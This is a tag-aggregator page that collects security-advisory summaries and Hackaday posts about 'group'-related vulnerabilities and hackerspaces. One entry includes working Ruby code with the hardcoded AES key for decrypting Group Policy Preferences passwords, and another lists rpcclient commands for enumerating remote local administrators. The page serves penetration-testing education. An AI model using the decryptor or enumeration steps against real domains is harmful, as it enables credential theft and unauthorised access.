«
Expand/Collapse
157 items tagged "group"
Related tags:
tiff image [+],
libtiff [+],
image buffer [+],
day [+],
cross [+],
ccitt [+],
buffer overflow vulnerability [+],
todd miller [+],
local privilege escalation [+],
e commerce group [+],
commerce group [+],
e commerce [+],
vpn implementation [+],
red hat security [+],
implementation [+],
hacker group [+],
hacker [+],
cisco ipsec [+],
cisco vpn [+],
cisco pix [+],
arbitrary code [+],
vulnerability [+],
virtual group [+],
pranian [+],
php [+],
moinmoin [+],
media [+],
information disclosure vulnerability [+],
webapps [+],
web [+],
vulnerabilities [+],
virtual [+],
ubuntu [+],
symmetric encryption [+],
sudo command [+],
slang [+],
selection [+],
security [+],
remote shell [+],
red [+],
python web [+],
python [+],
policy [+],
php news [+],
paster [+],
news [+],
network authentication system [+],
nafis [+],
n.e.t. e commerce [+],
media group [+],
mandriva linux [+],
majalty [+],
magnolia [+],
lostmon [+],
iran [+],
hat [+],
hackaday [+],
group selection [+],
geek [+],
gain root privileges [+],
formula group [+],
formula [+],
forgery [+],
enumeration [+],
development group [+],
development [+],
design group [+],
design [+],
default installation [+],
command execution [+],
command [+],
cisco adaptive [+],
bugzilla [+],
bugtraq [+],
ariatel [+],
alexander kurtz [+],
wuethrich [+],
wsis [+],
society [+],
sites [+],
series concentrators [+],
series [+],
security appliances [+],
robots [+],
ralf bendrath [+],
phishing [+],
permission [+],
pars [+],
paris [+],
office calendar [+],
n.e.t e commerce [+],
markus wuethrich [+],
markus beckedahl [+],
maildrop [+],
iwd [+],
india [+],
ifp [+],
hacks [+],
group permission [+],
germany [+],
georg greve [+],
fwd [+],
europe [+],
escalation [+],
desc [+],
def con [+],
chennai india [+],
chennai [+],
chaos communication camp [+],
call for papers [+],
call [+],
berlin [+],
attacker [+],
addressbook [+],
Pentesting [+],
sql injection [+],
year [+],
xpen [+],
x05 [+],
working group [+],
working [+],
wikileaks [+],
wi fi [+],
web group [+],
web applications group [+],
web applications [+],
vulnerability note [+],
vpn [+],
vows [+],
version [+],
unmanned ocean [+],
tindie [+],
technique [+],
tax woes [+],
tax exempt status [+],
tax [+],
targets [+],
tablet computers [+],
supplementary [+],
successes [+],
stormy night [+],
stack overflow [+],
st. louis [+],
spectrum [+],
sniff [+],
single group [+],
sid [+],
show [+],
shell [+],
share ideas [+],
script [+],
saudisoftech [+],
sailboat [+],
safer use [+],
safari for windows [+],
rpcclient [+],
robotics [+],
remote [+],
read [+],
reactor [+],
raymond forbes [+],
raids [+],
puppet [+],
protocol igmp [+],
pinta [+],
php sql [+],
php addressbook [+],
phil [+],
pentest [+],
peer group [+],
pcb [+],
pc administrator [+],
orlando florida [+],
online [+],
oic [+],
new [+],
nbsp [+],
name [+],
more [+],
mine [+],
mind [+],
microsoft [+],
michigan [+],
meng [+],
martinique [+],
mad scientist [+],
lvl [+],
louisville [+],
logistics group [+],
logistics [+],
links [+],
link dos [+],
launches [+],
kickstarter [+],
k meleon [+],
iwd group [+],
issue [+],
ireland [+],
internet group management protocol [+],
internet group management [+],
internet [+],
innovative media group [+],
implementation group [+],
icbms [+],
housing group [+],
housing [+],
haunted house [+],
hackerspace [+],
guid [+],
group version [+],
group talks [+],
group show [+],
group project [+],
group power [+],
group orders [+],
group news [+],
group data [+],
group cat [+],
grand rapids michigan [+],
grand rapids [+],
grand opening [+],
government businesses [+],
good resources [+],
fundraisers [+],
forbes [+],
financial institutions [+],
fbi [+],
etsy [+],
ern [+],
engine [+],
encrypted data [+],
elgg [+],
domain admin [+],
dll [+],
dissolution [+],
directory [+],
dev boards [+],
defends [+],
data modem [+],
data breach [+],
crack [+],
convertor [+],
consumer privacy [+],
consumer group [+],
consulting group [+],
consulting [+],
cons [+],
congresswoman [+],
conficker [+],
commerce [+],
claims [+],
claim responsibility [+],
claim [+],
cisco ios [+],
cat [+],
caribbean [+],
capacitor [+],
candy [+],
camaraderie [+],
burst data [+],
body scanners [+],
black hat [+],
beta2 [+],
axis [+],
august 1 [+],
arch [+],
antileaks [+],
anonymous [+],
animatronics [+],
alqatari [+],
alkon [+],
admins group [+],
administration side [+],
admin [+],
active directory [+],
acl [+],
accused [+],
aberystwyth university [+],
Software [+],
Hackerspaces [+],
HackIt [+],
General [+],
Discussion [+],
sql [+],
sudo [+],
runas [+],
dow [+],
txt [+],
privilege escalation vulnerability [+],
office [+],
group office [+]
-
-
4:01
»
Hack a Day
The etsy of electronics project, Tindie, has a brand new feature: It’s a Kickstarter-esque endeavor called a Fundraiser that allows you to sell your projects to other electron enthusiasts. Of course the new Tindie Fundraisers may soon be just another Kickstarter clone for “exciting,” “new,” and “innovative” Arduino dev boards, something we’ve lamented before. We’re really interested in seeing [...]
-
-
16:00
»
SecuriTeam
MoinMoin is prone to a security-bypass vulnerability because a group containing a virtual group fails to evaluate the ACL rules correctly.
-
-
11:01
»
Hack a Day
This year for Halloween, The Geek Group, decided to take a very different approach to outreach. Instead of making animatronics, or converting their giant (seriously HUGE) space into a haunted house, they held an event called “Computers Not Candy” where they teamed up with a large local company to bring 100 tablet computers to 100 [...]
-
-
11:26
»
SecDocs
Authors:
Markus Beckedahl Ralf Bendrath Tags:
social Event:
Chaos Communication Camp 2003 Abstract: The World Summit on the Information Society (WSIS) is the latest in a long series of world summits organized by the United Nations that deal with central questions of humanity like the environment, women‚s rights, development, climate change, etc. At the WSIS, information and communication are on the agenda for the first time. The world summit is supposed to develop a common understanding of the information society. In Germany, a WSIS working group initiated by the Network New Media has been meeting continuously since summer 2002. The group has debated the themes of the WSIS, developed civil society positions and planned own interventions. Since January 2003, three open meetings of this working group with members of other non-governmental organizations, alternative media and scientific institutions have been held in Berlin. The working group was expanded and officially established as the "German Civil Society Coordinating Group for WSIS". Delegates of the group have attended important European and world-wide preparatory conferences. They monitor the developments and try to influence the agenda in favor of civil society demands. Single members of the working group are engaged in the sub-committees and caucuses of the international Civil Society Plenary Coordination Group. For the worldwide preparatory meeting in Paris in July, the group sent Georg Greve, President of the Free Software Foundation, Europe, as a civil society delegate into the German governmental delegation. Other members of the group are involved in the counter and alternative summit activities that are currently being planned by media and computer activists, such as the Polymedia lab or the World Forum on Communication Rights. In this panel at the ccc-camp we want to talk about and discuss the topics of the WSIS. What is going on globally and which positions do the different Players like governments, civil society and business have? What are the positions, campains and activities of the global civil society? What is happening especially in Germany? How can civil society use the attention while the WSIS is going on to transport alternative topics like freedoms of information, free software and human rights in the information society?
-
11:24
»
SecDocs
Authors:
Markus Beckedahl Ralf Bendrath Tags:
social Event:
Chaos Communication Camp 2003 Abstract: The World Summit on the Information Society (WSIS) is the latest in a long series of world summits organized by the United Nations that deal with central questions of humanity like the environment, women‚s rights, development, climate change, etc. At the WSIS, information and communication are on the agenda for the first time. The world summit is supposed to develop a common understanding of the information society. In Germany, a WSIS working group initiated by the Network New Media has been meeting continuously since summer 2002. The group has debated the themes of the WSIS, developed civil society positions and planned own interventions. Since January 2003, three open meetings of this working group with members of other non-governmental organizations, alternative media and scientific institutions have been held in Berlin. The working group was expanded and officially established as the "German Civil Society Coordinating Group for WSIS". Delegates of the group have attended important European and world-wide preparatory conferences. They monitor the developments and try to influence the agenda in favor of civil society demands. Single members of the working group are engaged in the sub-committees and caucuses of the international Civil Society Plenary Coordination Group. For the worldwide preparatory meeting in Paris in July, the group sent Georg Greve, President of the Free Software Foundation, Europe, as a civil society delegate into the German governmental delegation. Other members of the group are involved in the counter and alternative summit activities that are currently being planned by media and computer activists, such as the Polymedia lab or the World Forum on Communication Rights. In this panel at the ccc-camp we want to talk about and discuss the topics of the WSIS. What is going on globally and which positions do the different Players like governments, civil society and business have? What are the positions, campains and activities of the global civil society? What is happening especially in Germany? How can civil society use the attention while the WSIS is going on to transport alternative topics like freedoms of information, free software and human rights in the information society?
-
-
6:00
»
Carnal0wnage
So i put this link out on twitter but forgot to put it on the blog.
I did a talk at the Oct 20012 NovaHackers meeting on exploiting 2008 Group Policy Preferences (GPP) and how they can be used to set local users and passwords via group policy.
I've run into this on a few tests where people are taking advantage of this exteremely handy feature to set passwords across the whole domain, and then allowing users or attackers the ability to decrypt these passwords and subsequently 0wning everything :-)
So here are the slides:
Exploiting Group Policy Preferences from
chrisgates Blog post explaining the issue in detail:
http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferencesMetasploit post module:
http://metasploit.com/modules/post/windows/gather/credentials/gppPowerShell module to do it:
http://obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.htmlI ended up writing some ruby to do it (the blog post has some python) because the metasploit module was downloading the xml file to loot but taking a poop prior to getting to the decode part. now you can do it yourself:
require 'rubygems'
require 'openssl'
require 'base64'
encrypted_data = "j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw"
def decrypt(encrypted_data)
padding = "=" * (4 - (encrypted_data.length % 4))
epassword = "#{encrypted_data}#{padding}"
decoded = Base64.decode64(epassword)
key = "\x4e\x99\x06\xe8\xfc\xb6\x6c\xc9\xfa\xf4\x93\x10\x62\x0f\xfe\xe8\xf4\x96\xe8\x06\xcc\x05\x79\x90\x20\x9b\x09\xa4\x33\xb6\x6c\x1b"
aes = OpenSSL::Cipher::Cipher.new("AES-256-CBC")
aes.decrypt
aes.key = key
plaintext = aes.update(decoded)
plaintext << aes.final
pass = plaintext.unpack('v*').pack('C*') # UNICODE conversion
return pass
end
blah = decrypt(encrypted_data)
puts blah
In Action:
user@ubuntu:~$ ruby gpp-decrypt-string.rb
Local*P4ssword!
-
-
9:00
»
Hack a Day
For [Ern]‘s MEng group project, his group had to develop a robotics platform capable of achieving some end goal. Because innovation is a large part of the grade, [Ern] convinced his team members to work with a brain controlled interface and build a mind controlled robotics platform. For wont of having an easy build, [Ern] [...]
-
-
18:31
»
Packet Storm Security Advisories
Red Hat Security Advisory 2012-1206-01 - Python Paste provides middleware for building and running Python web applications. The python-paste-script package includes paster, a tool for working with and running Python Paste applications. It was discovered that paster did not drop supplementary group privileges when started by the root user. Running "paster serve" as root to start a Python web application that will run as a non-root user and group resulted in that application running with root group privileges. This could possibly allow a remote attacker to gain access to files that should not be accessible to the application.
-
18:31
»
Packet Storm Security Recent Files
Red Hat Security Advisory 2012-1206-01 - Python Paste provides middleware for building and running Python web applications. The python-paste-script package includes paster, a tool for working with and running Python Paste applications. It was discovered that paster did not drop supplementary group privileges when started by the root user. Running "paster serve" as root to start a Python web application that will run as a non-root user and group resulted in that application running with root group privileges. This could possibly allow a remote attacker to gain access to files that should not be accessible to the application.
-
18:31
»
Packet Storm Security Misc. Files
Red Hat Security Advisory 2012-1206-01 - Python Paste provides middleware for building and running Python web applications. The python-paste-script package includes paster, a tool for working with and running Python Paste applications. It was discovered that paster did not drop supplementary group privileges when started by the root user. Running "paster serve" as root to start a Python web application that will run as a non-root user and group resulted in that application running with root group privileges. This could possibly allow a remote attacker to gain access to files that should not be accessible to the application.
-
-
6:01
»
Hack a Day
We’re very familiar with the Louisville Hackerspace LVL1 here at Hackaday. From their GLaDOS-inspired sentient overlord, an evil box to filter the Internet, and a friggin’ moat, LVL1 is the closest we’ve got to a mad scientist heard cackling from a wind-swept castle on a stormy night. It turns out they also have a rocketry program. [...]
-
-
13:01
»
Hack a Day
We’re happy to see some links rolling in from our call for Hackerspace introductions. This is sort of a reintroduction of The Geek Group. They’ve been around for a while and we’ve featured several interesting projects coming out of the collective (check out this pulse capacitor autopsy). You may remember some tax woes they ran into [...]
-
-
7:29
»
Packet Storm Security Advisories
Red Hat Security Advisory 2012-0306-03 - Kerberos is a network authentication system which allows clients and servers to authenticate to each other using symmetric encryption and a trusted third-party, the Key Distribution Center. It was found that ftpd, a Kerberos-aware FTP server, did not properly drop privileges. On Red Hat Enterprise Linux 5, the ftpd daemon did not check for the potential failure of the effective group ID change system call. If the group ID change failed, a remote FTP user could use this flaw to gain unauthorized read or write access to files that are owned by the root group.
-
7:29
»
Packet Storm Security Recent Files
Red Hat Security Advisory 2012-0306-03 - Kerberos is a network authentication system which allows clients and servers to authenticate to each other using symmetric encryption and a trusted third-party, the Key Distribution Center. It was found that ftpd, a Kerberos-aware FTP server, did not properly drop privileges. On Red Hat Enterprise Linux 5, the ftpd daemon did not check for the potential failure of the effective group ID change system call. If the group ID change failed, a remote FTP user could use this flaw to gain unauthorized read or write access to files that are owned by the root group.
-
7:29
»
Packet Storm Security Misc. Files
Red Hat Security Advisory 2012-0306-03 - Kerberos is a network authentication system which allows clients and servers to authenticate to each other using symmetric encryption and a trusted third-party, the Key Distribution Center. It was found that ftpd, a Kerberos-aware FTP server, did not properly drop privileges. On Red Hat Enterprise Linux 5, the ftpd daemon did not check for the potential failure of the effective group ID change system call. If the group ID change failed, a remote FTP user could use this flaw to gain unauthorized read or write access to files that are owned by the root group.
-
-
7:46
»
Packet Storm Security Exploits
Dow Group suffers from multiple remote SQL injection vulnerabilities in dynamic.php, news_desc.php, product.php, and solutions.php.
-
-
18:39
»
SecuriTeam
Cisco IPSec VPN Implementation suffers from a Group Name Enumeration Vulnerability.
-
Make your website safer. Use external penetration testing service. First report ready in one hour!
-
-
14:26
»
Packet Storm Security Advisories
The Cisco IPSec VPN implementation suffers from a group name enumeration vulnerability. Systems affected include the ASA 5500 Series Adaptive Security Appliances, Cisco PIX 500 Series Security Appliances, Cisco VPN 3000 Series Concentrators.
-
14:26
»
Packet Storm Security Misc. Files
The Cisco IPSec VPN implementation suffers from a group name enumeration vulnerability. Systems affected include the ASA 5500 Series Adaptive Security Appliances, Cisco PIX 500 Series Security Appliances, Cisco VPN 3000 Series Concentrators.
-
-
13:12
»
Packet Storm Security Advisories
Mandriva Linux Security Advisory 2011-018 - A patch for parse.c in sudo does not properly interpret a system group in the sudoers file during authorization decisions for a user who belongs to that group, which allows local users to leverage an applicable sudoers file and gain root privileges via a sudo command. NOTE: this vulnerability exists because of a CVE-2009-0034 regression. check.c in sudo 1.7.x before 1.7.4p5, when a Runas group is configured, does not require a password for command execution that involves a gid change but no uid change, which allows local users to bypass an intended authentication requirement via the -g option to a sudo command.
-
13:12
»
Packet Storm Security Recent Files
Mandriva Linux Security Advisory 2011-018 - A patch for parse.c in sudo does not properly interpret a system group in the sudoers file during authorization decisions for a user who belongs to that group, which allows local users to leverage an applicable sudoers file and gain root privileges via a sudo command. NOTE: this vulnerability exists because of a CVE-2009-0034 regression. check.c in sudo 1.7.x before 1.7.4p5, when a Runas group is configured, does not require a password for command execution that involves a gid change but no uid change, which allows local users to bypass an intended authentication requirement via the -g option to a sudo command.
-
13:12
»
Packet Storm Security Misc. Files
Mandriva Linux Security Advisory 2011-018 - A patch for parse.c in sudo does not properly interpret a system group in the sudoers file during authorization decisions for a user who belongs to that group, which allows local users to leverage an applicable sudoers file and gain root privileges via a sudo command. NOTE: this vulnerability exists because of a CVE-2009-0034 regression. check.c in sudo 1.7.x before 1.7.4p5, when a Runas group is configured, does not require a password for command execution that involves a gid change but no uid change, which allows local users to bypass an intended authentication requirement via the -g option to a sudo command.
-
-
18:29
»
Packet Storm Security Advisories
Ubuntu Security Notice 1046-1 - Alexander Kurtz discovered that sudo would not prompt for a password when a group was specified in the Runas_Spec. A local attacker could exploit this to execute arbitrary code as the specified group if sudo was configured to allow the attacker to use a program as this group. The group Runas_Spec is not used in the default installation of Ubuntu.
-
18:29
»
Packet Storm Security Recent Files
Ubuntu Security Notice 1046-1 - Alexander Kurtz discovered that sudo would not prompt for a password when a group was specified in the Runas_Spec. A local attacker could exploit this to execute arbitrary code as the specified group if sudo was configured to allow the attacker to use a program as this group. The group Runas_Spec is not used in the default installation of Ubuntu.
-
18:29
»
Packet Storm Security Misc. Files
Ubuntu Security Notice 1046-1 - Alexander Kurtz discovered that sudo would not prompt for a password when a group was specified in the Runas_Spec. A local attacker could exploit this to execute arbitrary code as the specified group if sudo was configured to allow the attacker to use a program as this group. The group Runas_Spec is not used in the default installation of Ubuntu.
-
-
16:24
»
Packet Storm Security Advisories
NGS Secure has discovered an enumeration vulnerability in (Cisco) Cisco VPN Concentrator, Cisco PIX and Cisco Adaptive Security Appliance.
-
-
14:50
»
SecuriTeam
A vulnerability in the Internet Group Management Protocol (IGMP) version 3 implementation of Cisco IOS Software and Cisco IOS XE Software allows a remote unauthenticated attacker to cause a reload of an affected device.
-
Make your website safer. Use external penetration testing service. First report ready in one hour!
-
-
12:00
»
Hack a Day
This is the Pinta, an autonomous sailboat built to attempt an ocean crossing from Ireland to Martinique (in the Caribbean). A group of researchers at Aberystwyth University built her as part of the Microtransat Challenge. To keep tabs on the vessel her creators included an Iridium short burst data modem with a backup system made from a SPOT [...]
-
-
23:02
»
Packet Storm Security Recent Files
Ubuntu Security Notice 983-1 - Markus Wuethrich discovered that sudo did not always verify the user when a group was specified in the Runas_Spec. A local attacker could exploit this to execute arbitrary code as root if sudo was configured to allow the attacker to use a program as a group when the attacker was not a part of that group.
-
23:01
»
Packet Storm Security Advisories
Ubuntu Security Notice 983-1 - Markus Wuethrich discovered that sudo did not always verify the user when a group was specified in the Runas_Spec. A local attacker could exploit this to execute arbitrary code as root if sudo was configured to allow the attacker to use a program as a group when the attacker was not a part of that group.
-
-
11:00
»
Hack a Day
PCB Group Orders [Phil] wrote in to let us know about the DorkbotPDX group orders. The site makes group PCB orders until a cutoff date or the panel is full. You get three copies of your design with no setup fee for just $5/square inch including domestic postage. Not a bad price. We aren’t affiliated [...]
-
-
19:11
»
Carnal0wnage
Got asked to help remotely locate local admins on boxes on a network.
rpcclient $> enumalsgroups
Usage: enumalsgroups builtin|domain [access mask]
rpcclient $> enumalsgroups builtin
group:[Administrators] rid:[0x220]
group:[Backup Operators] rid:[0x227]
group:[Guests] rid:[0x222]
group:[Network Configuration Operators] rid:[0x22c]
group:[Power Users] rid:[0x223]
group:[Remote Desktop Users] rid:[0x22b]
group:[Replicator] rid:[0x228]
group:[Users] rid:[0x221]
Now you would think that doing a querygroup would give you the right output, but actually you get a:
rpcclient $> querygroup 0x220
result was NT_STATUS_NO_SUCH_GROUP
Honestly I have no idea why this doesn't work, it *should*. If anyone knows why it doesn't I know more than one person who would like to know.
Anyway it takes one more step but you can do it this way:
rpcclient $> queryaliasmem
Usage: queryaliasmem builtin|domain rid [access mask]
rpcclient $> queryaliasmem builtin 0x220
sid:[S-1-5-21-1214440339-1383384898-839522115-500]
sid:[S-1-5-21-1214440339-1383384898-839522115-1003]
sid:[S-1-5-21-2392188729-2485841371-4291725810-512]
Then you can look up who those SIDs belong to
rpcclient $> lookupsids
Usage: lookupsids [sid1 [sid2 [...]]]
rpcclient $> lookupsids S-1-5-21-1214440339- 1383384898-839522115-500
S-1-5-21-1214440339-1383384898-839522115-500 PC\Administrator (1)
rpcclient $> lookupsids
S-1-5-21-1214440339-1383384898-839522115-1003
S-1-5-21-1214440339-1383384898-839522115-1003 PC\user (1)
rpcclient $> lookupsids
S-1-5-21-2392188729-2485841371-4291725810-512 rpc_api_pipe: Remote machine 192.168.242.128 pipe \lsarpc fnum 0x4001 returned critical error. Error was Call timed out: server did not respond after 10000 milliseconds result was NT_STATUS_IO_TIMEOUT
Not sure about the 512 (its a MS built-in account I think) but the 1003 was the user I added to the local admins group.
-
-
11:02
»
Hack a Day
Non-profit hackerspace The Geek Group has been hit with a hefty tax bill despite their tax-exempt status. We featured a boom camera built by the organization back in November. It is the goal of The Geek Group to fulfill the thirst to explore and create by providing facilities, peer group, and camaraderie that make knowledge [...]
-
-
7:58
»
Hack a Day
Here at HackaDay, we are always a fan of a group of hackers coming together to create a place to share ideas, tools, parts, and stories. A group from St. Louis called Arch Reactor have managed to secure a new location, and are having their grand opening this Saturday. From 4-10pm on the 30th, they [...]
-
-
14:10
»
remote-exploit & backtrack
A few years ago i did the A+ and recently i took the MCDST as i managed to get it free as we setup a micorsoft testing centre. i am now working as a desktop support technician in a hospital and am learning alot. i am however becoming frustrated as i really want to learn more about group policy and the server/administration side of things which comes into play alot.
A few years ago i got a complete set of books which is windows 2000 MCSE i was just going to dig them out however is it woth my while reading them or have things changed too much now since server 2003.
I have no more training resource available so i guess im looking for pointers from someone with systems experience to learn about domains, workgroup enviroments and admin/group policy.